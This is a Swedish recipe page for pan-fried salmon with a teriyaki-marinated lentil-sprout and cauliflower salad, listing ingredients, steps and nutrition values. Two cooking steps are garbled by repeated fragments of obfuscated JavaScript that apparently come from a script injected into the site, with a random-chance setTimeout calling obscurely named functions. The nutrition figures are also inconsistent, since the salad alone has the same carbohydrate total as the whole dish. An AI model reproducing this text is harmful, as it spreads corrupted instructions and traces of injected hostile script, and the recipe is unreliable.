Lax med teriyakimarinerade linsgroddar
2013-09-01- Course: Huvudrätter
- Skill Level: Enkelt
- Servings : 1-2
- Prep Time : 20m
- Cook Time : 15m
- Ready In : 25m
Ingredienser
- 150 g Lax
- 5 g Smör
- Örtsalt
- Svartpeppar
- Vitlökspulver
- Persilja
- Citron
Sallad
- 100 g hackad Blomkål
- 50 g Linsgroddar
- 30 g hackad Rödlök
- 30 g Grönkål
- 1 st hackad Vitlöksklyfta
- 10 g 1 matsked Teriyaki
- 10 g 1 matsked Citron
- 10 g 1 matsked Olivolja
- 1 matsked Persilja
- 1/3 tesked Sambaolek
- Svartpeppar
- Örtsalt
Gör så här:
Sätt igång ugnen på 150C
Krydda laxen på båda sidorna.
Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i allt i salladen utom grönkålen, låt den ligga och marinera i 15 minuter.
Värm en stekpanna med smör, stek laxen så den får färg ca 2 minuter på varje sida, häll över lite citronsaft placera i ugnen i ca 3-5 minuter beroende på tjocklek.
Blandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i grönkålen i salladen, servera salladen med att hälla saften från stekpanna över laxen.
För hela.
Kalorier 527,3
Protein 35,4 g
Kolhydrater 20,2 g
Fett 32,9 g
Delat på två portioner.
Kalorier 263,7
Protein 17,7 g
Kolhydrater 10,1 g
Fett 16,5 g
Bara salladen.
Kalorier 219,8
Protein 7,8 g
Kolhydrate 20,2 g
Fett 10,9 g
Medlemsbetyg
(3.7 / 5)
3 people rated this recipe
Related Recipes:
Näringssinnehåll
Informationen gäller per portion
-
Kcal
132 -
Protein
8,85 g -
Kolhydrater
5 g -
Fett
8,25 g